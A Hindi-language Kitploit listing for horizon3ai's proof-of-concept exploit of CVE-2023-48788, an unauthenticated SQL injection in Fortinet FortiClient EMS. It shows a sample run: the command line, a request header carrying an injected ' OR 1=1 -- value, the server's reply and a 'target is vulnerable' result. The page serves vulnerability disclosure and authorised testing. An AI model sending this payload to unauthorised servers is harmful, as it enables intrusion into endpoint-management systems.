Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-48788 — Fortinet FortiClient EMS SQL इंजेक्शन भेद्यता (CVE-2023-48788) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। बिना प्रमाणीकरण के SQL इंजेक्शन प्रदर्शित करता है, जिससे सिस्टम जानकारी निकाली जा सकती है और लक्ष्य की संवेदनशीलता की पुष्टि की जा सकती है। | Kitploit
उपकरण/GitHubGitHub/horizon3ai/cve-2023-48788
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubhorizon3ai/cve-2023-48788

CVE-2023-48788

Fortinet FortiClient EMS SQL इंजेक्शन भेद्यता (CVE-2023-48788) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। बिना प्रमाणीकरण के SQL इंजेक्शन प्रदर्शित करता है, जिससे सिस्टम जानकारी निकाली जा सकती है और लक्ष्य की संवेदनशीलता की पुष्टि की जा सकती है।

रिपॉजिटरी देखें
54112 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-48788 Fortinet FortiClient EMS SQL Injection Vulnerabilitiy

FortiClient EMS CVE-2023-48788 के लिए एक शोषण प्रूफ ऑफ कॉन्सेप्ट

ब्लॉग पोस्ट

अधिक विवरण यहाँ: https://www.horizon3.ai/attack-research/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive

उपयोग

root@kitploit:~
$ python3 CVE-2023-48788.py -t 192.168.1.3 -p 8013
[+] Sent Message!
MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD' OR 1=1 --
IP=127.0.0.1
MAC=00-50-56-11-22-33
FCT_ONNET=0
CAPS=32767
VDOM=default
EC_QUARANTINED=0
SIZE=    1600

X-FCCK-REGISTER: SYSINFO||QVZTSUdfVkVSPTEuMDAwMDAKUkVHX0tFWT1fCkVQX09OTkVUQ0hLU1VNPTAKQVZFTkdfVkVSPTYuMDAyNjYKREhDUF9TRVJWRVI9Tm9uZQpGQ1RPUz1XSU42NApWVUxTSUdfVkVSPTEuMDAwMDAKRkNUVkVSPTcuMC43LjAzNDUKQVBQU0lHX1ZFUj0xMy4wMDM2NApVU0VSPUFkbWluaXN0cmF0b3IKQVBQRU5HX1ZFUj00LjAwMDgyCkFWQUxTSUdfVkVSPTAuMDAwMDAKVlVMRU5HX1ZFUj0yLjAwMDMyCk9TVkVSPU1pY3Jvc29mdCBXaW5kb3dzIFNlcnZlciAyMDE5ICwgNjQtYml0IChidWlsZCAxNzc2MykKQ09NX01PREU9Vk13YXJlIFZpcnR1YWwgUGxhdGZvcm0KUlNFTkdfVkVSPTEuMDAwMjAKQVZfUFJPVEVDVEVEPTAKQVZBTEVOR19WRVI9MC4wMDAwMApQRUVSX0lQPQpFTkFCTEVEX0ZFQVRVUkVfQklUTUFQPTQ5CkVQX09GRk5FVENIS1NVTQ==
X-FCCK-REGISTER-END


b'FCKARPLY: CONT|1|EMSSN|FCTEMS0000125605:DESKTOP-RFJJIFA|UPLD_PRT|8013|KA_INTERVAL|60|LIC_FEATS|283004|LIC_ED|1867910400|AUTH_PRD|0|SNAPTIME|0|QUAR|0|AVTR|1|AV_SIG|92.02456|SERIAL|56F9B1CCCB1ABD1B69E05B3A451A1A1656032602|EMS_ONNET|0|TAGS|000000000000000000000000000000000000000000000000000|\r\n'
[+] The target is vulnerable!

नवीनतम सुरक्षा अनुसंधान के लिए Twitter पर Horizon3.ai Attack Team को फॉलो करें:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

अस्वीकरण

यह सॉफ्टवेयर पूर्ण रूप से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उपयोग प्रणालियों पर हमला करने के लिए नहीं किया जाना है, सिवाय उन मामलों के जहाँ स्पष्ट रूप से अधिकृत किया गया हो। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए उत्तरदायी या जिम्मेदार नहीं हैं। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें